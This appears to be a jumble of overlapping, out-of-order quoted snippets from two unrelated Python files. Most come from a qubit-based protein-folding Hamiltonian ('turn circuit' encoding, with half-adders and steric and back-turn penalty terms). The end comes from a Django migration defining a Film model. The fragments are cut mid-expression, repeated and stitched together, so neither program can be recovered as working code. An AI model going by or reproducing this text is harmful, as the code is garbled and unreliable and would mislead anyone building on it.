self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for", "term for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0", "\"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3): for j", "range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for", "qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1])", "* (1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that", "k in ['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ *", "1 if the chain moves in the direction y+.\"\"\" return q_i*q_j def circuit_yn(self,", "return 2 def pointer(self, i): \"\"\"Points to the start of the string describing", "in range(i, j)] 
elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)]))", "def get(self, k): \"\"\"Access the kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def", "sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "a circuit that returns 1 if the chain moves in the direction y+.\"\"\"", "returns 1 if the chain moves in the direction x-.\"\"\" return q_i*(1-q_j) def", "sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['x', 'z']]) return", "0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\", "'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), }", "def redun_term(self): \"\"\"Implements the term that penalises meaningless residue bitstrings 000 and 011.\"\"\"", "> math.log2(j-i): continue else: counter[h] += 1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h]", "sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1))", "elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "k)] def back_term(self): \"\"\"Ensures that the chain does not go back on itself.\"\"\"", "in the direction y+.\"\"\" return q_i*q_j def 
circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit", "if the chain moves in the direction z-.\"\"\" return (1-q_i) * q_j *", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)),", "functools import reduce from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian):", "qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1])", "from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'):", "+= (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args)", "sum([ sum([ self.overlap(i, j) for j in range(i+1, self.naas)]) for i in range(self.naas)])", "return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for", "+ \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "* (self.a_x(i, j) + \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\"", "range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * 
self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i", "def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return 2 def pointer(self, i):", "\\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ * qand([", "self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)),", "+ \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit' def", "(1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self):", "chain from functools import reduce from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian", "sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)])", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), 
self.get(self.pointer(i+1)+2)) + \\", "\\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\ + sum([", "self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "for k in ['y', 'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\", "self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers =", "methods of a protein hamiltonian of the \"turn circuit encoding\" form, described by", "else 0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r])", "0 or maximum < 2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j,", "* qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2,", "iterator = range(1, t+1, 2) if t > 1 else [1] for h", "self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)),", "for r in range(maximum)]) for k in ['x', 'y']]) return prefactor * \\", "int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if maximum == 0: return 0", "in the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit", "* self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes", "qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0])", "= list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i,", 
"self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the chain does not go back", "in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)])", "* q_j * q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "== 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif", "a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class", "1 if the chain moves in the direction z+.\"\"\" return (1-q_i) * (1-q_j)", "chain moves in the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements", "k][r]) for r in range(maximum)]) for k in ['x', 'z']]) return prefactor *", "j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i,", "self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) +", "j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=", "chain moves in the direction y+.\"\"\" return q_i * (1-q_j) * q_k def", "circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain moves", "steric_term(self): \"\"\"Ensures that the chain does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j)", "def back_term(self): \"\"\"Ensures that the chain does not go back on itself.\"\"\" return", "else [1] for 
h in iterator: if self.ss_fmat == 'babej': if counter[h] >", "does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for j in range(i+1, self.naas)])", "return q_i * q_j * q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a", "* self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2))", "3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr +=", "self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j)", "string.\"\"\" if i > j: raise ValueError(\"i > j\") if (i, j, k)", "q_k): \"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) *", "that returns 1 if the chain moves in the direction z+.\"\"\" return (1-q_i)", "\\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "r in range(maximum)]) for k in ['x', 'z']]) return prefactor * \\ (", "self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)),", "or maximum < 2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'),", "(1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i >", "1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return 3", "maximum+1)]) for p in range(2, maximum+1)])) def a_y(self, i, j): sumstring = {", 
"self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i, j):", "p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p", "x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1", "qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1])", "back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)),", "for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1* self.int_mat[i, j]", "returns 1 if the chain moves in the direction z-.\"\"\" return (1-q_i) *", "+ \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)),", "k): \"\"\"Access the kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i,", "def a_x(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i,", "* self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)),", "in range(i, j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), 
self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)),", "\\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\ * qand([", "half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2", "described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim", "t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for", "return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in", "in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_y(self, i, j): sumstring", "\\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in", "sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'x-':", "for p in range(2, maximum+1)])) def a_z(self, i, j): sumstring = { 'x+':", "qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)]))", "* qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1],", "sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i,", "qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def", "\\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\ + sum([", "turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1", "j in range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self, 
i, j): sumstring", "math import numpy as np import sympy as sp import symengine as se", "redun_term(self): \"\"\"Implements the term that penalises meaningless residue bitstrings 000 and 011.\"\"\" return", "for k in ['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\", "self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap", "return -1* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j) + \\", "k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i,", "q_j * q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", "import deepcopy from itertools import chain from functools import reduce from .qlogic import", "circuit that returns 1 if the chain moves in the direction x-.\"\"\" return", "for r in range(maximum)]) for k in ['y', 'z']]) return prefactor * \\", "000.\"\"\" return (1-q_i) * q_j * q_k def sum_string(self, i, j, k): \"\"\"Computes", "= True @property def dim(self): return 2 def pointer(self, i): \"\"\"Points to the", "* q_k def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i", "self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers", "self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i, j):", "dim(self): return 3 def pointer(self, i): \"\"\"Points to the start of the string" ]
[ "django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations =", "models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6',", "('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ],", "] operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name',", "('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'),", "film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), ]", "class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [", "models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3',", "migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),", "('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'),", "'8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 
'TV Show'),", "# Generated by Django 3.2.4 on 2021-10-11 10:34 from django.conf import settings from", "migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL),", "('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV", "models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)),", "= True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[", "models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'),", "('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated',", "('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9',", "Django 3.2.4 on 2021-10-11 10:34 from django.conf import settings from django.db import migrations,", "'4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')],", "name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)),", "2021-10-11 10:34 from django.conf import settings from 
django.db import migrations, models import django.db.models.deletion", "'5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)),", "initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film',", "django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial", "models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4',", "'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'),", "migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre',", "'3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'),", "on 2021-10-11 10:34 from django.conf import settings from django.db import migrations, models import", "Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),", "[ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False,", "serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'),", "('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7',", 
"'6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie',", "'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE,", "('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated',", "('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film',", "from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies", "3.2.4 on 2021-10-11 10:34 from django.conf import settings from django.db import migrations, models", "'10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show',", "operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)),", "by Django 3.2.4 on 2021-10-11 10:34 from django.conf import settings from django.db import", "primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1',", "'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ),", "('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'),", 
"import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [", "'9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated", "models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5',", "import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations", "10:34 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class", "django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies =", "models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ]", "import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial =", "= [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date',", "Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel(", "('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type',", "'1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'),", "[ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', 
models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)),", "('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8',", "fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating',", "default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated", "verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2',", "from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration):", "('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'),", "max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')],", "('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10',", "True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[ ('id',", "('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'),", "'2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'),", "Generated by Django 3.2.4 on 2021-10-11 10:34 from django.conf 